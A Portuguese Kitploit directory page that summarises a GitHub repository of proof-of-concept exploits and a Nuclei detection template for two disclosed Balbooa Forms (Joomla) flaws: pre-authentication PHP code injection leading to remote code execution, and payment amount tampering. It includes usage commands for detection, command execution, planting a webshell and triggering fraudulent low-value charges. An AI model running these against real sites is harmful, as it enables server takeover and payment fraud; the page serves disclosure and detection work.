Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-67363-67364 — PoCs e modelos de detecção para RCE pré-autenticação e adulteração de pagamentos no Balbooa Forms (Joomla), incluindo exploit em Python e modelo de detecção Nuclei. | Kitploit
Ferramentas/GitHubGitHub/lulztigre/cve-2026-67363-67364
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHublulztigre/cve-2026-67363-67364

cve-2026-67363-67364

PoCs e modelos de detecção para RCE pré-autenticação e adulteração de pagamentos no Balbooa Forms (Joomla), incluindo exploit em Python e modelo de detecção Nuclei.

Ver Repositório
há 3h 32mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Balbooa Forms RCE pré-autenticação + Adulteração de Pagamento (CVE-2026-67364 / CVE-2026-67363)

PoC e modelos de detecção para duas vulnerabilidades pré-autenticação no Balbooa Forms (com_baforms) para Joomla, corrigidas na versão 2.4.3.2.

  • CVE-2026-67364 — Injeção de Código PHP pré-autenticação -> RCE (CVSS 9.8)
  • CVE-2026-67363 — Adulteração do Valor de Pagamento pré-autenticação (Stripe / Authorize.net)

Descobertas por Lulztigre, divulgação coordenada via Joomla Security Strike Team (JSST), publicadas em 2026-08-19. Artigo completo: https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html

Arquivos

ArquivoFinalidade
balbooa_forms_poc.pyPoC em Python, apenas stdlib, cobre ambas as CVEs
CVE-2026-67364.yamlModelo Nuclei, detecção não destrutiva do RCE via eval

PoC em Python

Zero dependências (Python 3.8+). Os modos rce e detect não gravam arquivos e não disparam cobranças reais; shell e pay são opcionais e destinados ao uso em laboratório.

root@kitploit:~
# 1. Encontre um par (form-id, submit-btn) vulnerável. Não destrutivo: cada sonda é uma
#    submissão anônima com um payload de marcador de eco.
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10

# 2. Prove a execução de comandos. A saída retorna na resposta HTTP, sem persistência.
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id

# 3. Prova clássica de webshell (apenas laboratório - grava images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7

# 4. Adulteração do valor de pagamento (apenas laboratório - dispara tentativas de cobrança REAIS; requer --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01

Código de saída 0 = vulnerável/explorado, 1 = limpo ou falhou, 2 = erro de uso.

Observações:

  • O RCE via eval exige a pré-condição administrativa documentada: um botão de envio com um manipulador PHP personalizado referenciando [Parâmetro de URL = X], e sem reCAPTCHA no botão.
  • --insecure ignora a verificação TLS para alvos HTTPS com certificados autoassinados.
  • Builds mais antigas do Joomla podem não exigir o token CSRF; o PoC continua sem ele quando o endpoint do token se comporta de forma inadequada.

Modelo Nuclei

Apenas detecção: extrai o token CSRF anônimo, depois varre pequenos intervalos de form/btn com um payload de marcador de eco e corresponde o marcador na resposta. Nenhum arquivo é gravado, nenhuma cobrança real é disparada.

root@kitploit:~
nuclei -t CVE-2026-67364.yaml -u http://target -v

Verificado contra nuclei v3.11.1 (Windows + Linux): extração de token, varredura de 30 pares (form-id 1..3 x submit-btn 1..10, clusterbomb), 1 correspondência crítica no par vulnerável. Adicione -duc em máquinas offline para pular a verificação de atualização. A varredura é deliberadamente pequena; aumente os intervalos de payload se um alvo hospedar mais formulários. A adulteração de pagamento (CVE-2026-67363) NÃO é automatizada intencionalmente no nuclei: cada sonda é uma tentativa de cobrança real contra o gateway do comerciante.

Linha do tempo da divulgação

  • 2026-08-13: fornecedor notificado (Balbooa, [email protected])
  • 2026-08-13: pedido de CVE registrado junto à JSST ([email protected])
  • 2026-08-19: ambos os registros publicados, corrigidos na 2.4.3.2 (Atualização de Endurecimento de Segurança)

Use apenas contra sistemas que você está autorizado a testar.

Baixar ferramenta